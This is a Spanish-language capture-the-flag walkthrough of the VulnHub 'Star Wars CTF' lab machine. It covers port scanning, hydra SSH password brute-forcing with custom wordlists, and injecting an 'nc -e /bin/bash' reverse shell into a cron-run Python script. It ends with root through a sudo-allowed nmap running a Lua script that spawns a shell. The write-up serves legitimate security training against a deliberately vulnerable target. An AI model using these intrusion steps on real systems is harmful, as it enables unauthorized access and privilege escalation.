[VULNHUB] Star Wars CTF

Hoy vamos a hackear la maquina de Vulnhub llamada Star Wars CTF. Podeis descargarla desde el siguiente enlace: Star Wars CTF

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.35                                                  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 12:37 CEST
Nmap scan report for 192.168.1.35
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4c:53:4d:b2:26:ee:a5:10:d4:be:99:84:2a:9a:aa:11 (RSA)
|   256 95:d7:a4:e0:74:63:4b:08:b0:a8:8c:dc:e1:f8:91:25 (ECDSA)
|_  256 1d:07:d1:3d:99:02:f0:04:ba:23:c3:a4:fd:0d:3d:91 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds
En http://192.168.1.35/robots.txt aparece:

Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG. 
Visitamos http://192.168.1.35/r2d2 y podemos ver que hay mucho texto... Por otro lado nos descargamos las 2 imagenes que aparecen en la web inicial de http://192.168.1.35.

~ > wget http://192.168.1.35/yoda.jpg
~ > wget http://192.168.1.35/yoda.png
Puede que contengan algo de stego, asi que buscamos en un buscador algo de "stego online"... Encontramos la siguiente web[1], y al pasarle la imagen yoda.png vemos que nos aparece que la autentica password es babyYoda123 pero no tenemos ningun login... Buscamos en google alguna wordlist de starwars y encontramos esta[2]. La descargamos, y la usaremos como diccionario de "logins" usando la password que hemos encontrado anteriormente. Lanzamos hydra!

~ > hydra -L starwars.txt -p babyYoda123 192.168.1.35 ssh -f 
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 
19:25:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip 
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 217 login tries 
(l:217/p:1), ~14 tries per task
[DATA] attacking ssh://192.168.1.35:22/
[22][ssh] host: 192.168.1.35   login: han   password: babyYoda123
[STATUS] attack finished for 192.168.1.35 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 
19:25:20
Obtenemos la password del usuario "han". Nos logueamos!

Low Shell



~ > ssh han@192.168.1.35                                                      
han@192.168.1.35's password: 
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 23 08:18:42 2020 from ::1
han@starwars:~$ id
uid=1000(han) gid=1000(han) groups=1000(han)
Exploramos un poco el sistema...

han@starwars:~$ ls -la
total 32
drwxr-xr-x 4 han  han  4096 Jul 23 08:11 .
drwxr-xr-x 5 root root 4096 Jul 23 08:18 ..
-rw------- 1 han  han   483 Jul 24 20:42 .bash_history
-rw-r--r-- 1 han  han   220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 han  han  3526 Apr 18  2019 .bashrc
drwx------ 3 han  han  4096 Jul 23 08:02 .gnupg
-rw-r--r-- 1 han  han   807 Apr 18  2019 .profile
drwxr-xr-x 2 han  han  4096 Jul 24 20:27 .secrets
han@starwars:~$ cd .secrets
han@starwars:~/.secrets$ ls -la
total 12
drwxr-xr-x 2 han han 4096 Jul 24 20:27 .
drwxr-xr-x 4 han han 4096 Jul 23 08:11 ..
-rw-r----- 1 han han   22 Jul 24 20:28 note.txt
han@starwars:~/.secrets$ cat note.txt
Anakin is a cewl kid.
han@starwars:~/.secrets$ 
Vemos que hay una note.txt en el directorio .secrets. Utiliza 2 palabras interesantes: "Anakin" y "cewl". Podemos ver por un lado que el usuario skywalker pertenece al grupo "anakin".

han@starwars:~/.secrets$ cat /etc/group
anakin:x:2000:Darth,skywalker
Por otro lado, vamos a usar la herramienta "cewl" que sirve para "preparar" diccionarios utilizando la web que hemos visto antes con tanto texto.

cewl http://192.168.1.35/r2d2 > dic2.txt
Una vez lo tenemos todo, usamos hydra para ver si obtenemos el password de skywalker con el diccionario que hemos hecho.

~ > hydra -l skywalker -P dic2.txt 192.168.1.35 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 
19:31:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 328 login tries 
(l:1/p:328), ~21 tries per task
[DATA] attacking ssh://192.168.1.35:22/
[22][ssh] host: 192.168.1.35   login: skywalker   password: tatooine
Lo tenemos :) Nos logueamos como skywalker.

~ > ssh skywalker@192.168.1.35                                                
                                                                                
    39s
skywalker@192.168.1.35's password: 
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 24 20:09:34 2020 from 192.168.0.118
skywalker@starwars:~$ id
uid=1001(skywalker) gid=1001(skywalker) groups=1001(skywalker),2000(anakin)
Exploramos un poco el sistema.

skywalker@starwars:~$ cd .secrets/
skywalker@starwars:~/.secrets$ ls
note.txt
skywalker@starwars:~/.secrets$ cat note.txt 
Darth must take up the job of being a good father
Vemos que en la nota esta vez la palabra "interesante" es job. Seguimos explorando...

skywalker@starwars:~/.secrets$ cd /home
skywalker@starwars:/home$ ls
Darth  han  skywalker
skywalker@starwars:/home$ cd Darth
skywalker@starwars:/home/Darth$ ls -la
total 44
drwxr-xr-x 5 Darth Darth 4096 Jul 24 21:03 .
drwxr-xr-x 5 root  root  4096 Jul 23 08:18 ..
-rw------- 1 Darth Darth 2351 Jul 24 22:33 .bash_history
-rw-r--r-- 1 Darth Darth  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 Darth Darth 3526 Apr 18  2019 .bashrc
drwx------ 3 Darth Darth 4096 Jul 23 08:20 .gnupg
-rw------- 1 Darth Darth   42 Jul 24 21:03 .lesshst
drwxr-xr-x 3 Darth Darth 4096 Jul 24 19:43 .local
-rw-r--r-- 1 Darth Darth  807 Apr 18  2019 .profile
drwxr-xr-x 2 Darth Darth 4096 Jul 24 20:13 .secrets
-rw-r--r-- 1 Darth Darth   66 Jul 24 19:43 .selected_editor
skywalker@starwars:/home/Darth$ cd .secrets
skywalker@starwars:/home/Darth/.secrets$ ls -la
total 12
drwxr-xr-x 2 Darth Darth  4096 Jul 24 20:13 .
drwxr-xr-x 5 Darth Darth  4096 Jul 24 21:03 ..
-rwxrw-r-- 1 Darth anakin  105 Jul 24 20:10 evil.py
Dentro del home de Darth, y dentro de la carpeta .secrets vemos que hay un script en python que se llama evil.py. Tenemos permisos de escritura sobre el, y con la pista de la nota anterior, seguramente sea un script que se ejecuta cada X tiempo. El contenido del script tiene:

skywalker@starwars:/home/Darth/.secrets$ cat evil.py
# Let the fear flow through you every single minute

fear = 1
anger = fear
hate = anger
suffering = hate
Lo modificamos para que no devuelva una reverse shell.

skywalker@starwars:/home/Darth/.secrets$ cat evil.py
import os
os.system("nc -e /bin/bash 192.168.1.59 5555")
Ponemos nc a la escucha...

~ > nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.35] 34298
Y al cabo de un momento.

~ > nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.35] 34298
python -c 'import pty;pty.spawn("/bin/bash")'
Darth@starwars:~$ 

Privilege Escalation


Ahora ya somos Darth! Miramos si podemos hacer algo con sudo.

Darth@starwars:~$ sudo -l
sudo -l
Matching Defaults entries for Darth on starwars:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User Darth may run the following commands on starwars:
    (ALL) NOPASSWD: /usr/bin/nmap
Darth@starwars:~$ 
Podemos usar nmap. En este caso, nmap no acepta el parametro --interactive que podriamos utilizar para escalar privilegios. Lo que haremos sera crear un script ".nse" que se lo pasaremos a nmap y nos facilitara una shell. Creamos el script (en lua).

Darth@starwars:/tmp$ echo "os.execute(\"/bin/sh\")" > b.nse
Ejecutamos...

Darth@starwars:~$ sudo nmap --script=/tmp/b.nse
sudo nmap --script=/tmp/b.nse
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 09:20 EDT
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt



# cd /root
# cat flag.txt
    .-.
                      |_:_|
                     /(_Y_)\
.                   ( \/M\/ )
 '.               _.'-/'-'\-'._
   ':           _/.--'[[[[]'--.\_
     ':        /_'  : |::"| :  '.\
       ':     //   ./ |oUU| \.'  :\
         ':  _:'..' \_|___|_/ :   :|
           ':.  .'  |_[___]_|  :.':\
            [::\ |  :  | |  :   ; : \
             '-'   \/'.| |.' \  .;.' |
             |\_    \  '-'   :       |
             |  \    \ .:    :   |   |
             |   \    | '.   :    \  |
             /       \   :. .;       |
            /     |   |  :__/     :  \\
           |  |   |    \:   | \   |   ||
          /    \  : :  |:   /  |__|   /|
      snd |     : : :_/_|  /'._\  '--|_\
          /___.-/_|-'   \  \
                         '-'

I hope you liked it Padawan :)  # 

End


Y con esto ya seriamos root de la maquina. [1]https://stylesuxx.github.io/steganography/ [2]https://gist.github.com/bgilham/f1796d6eab8f283f64f4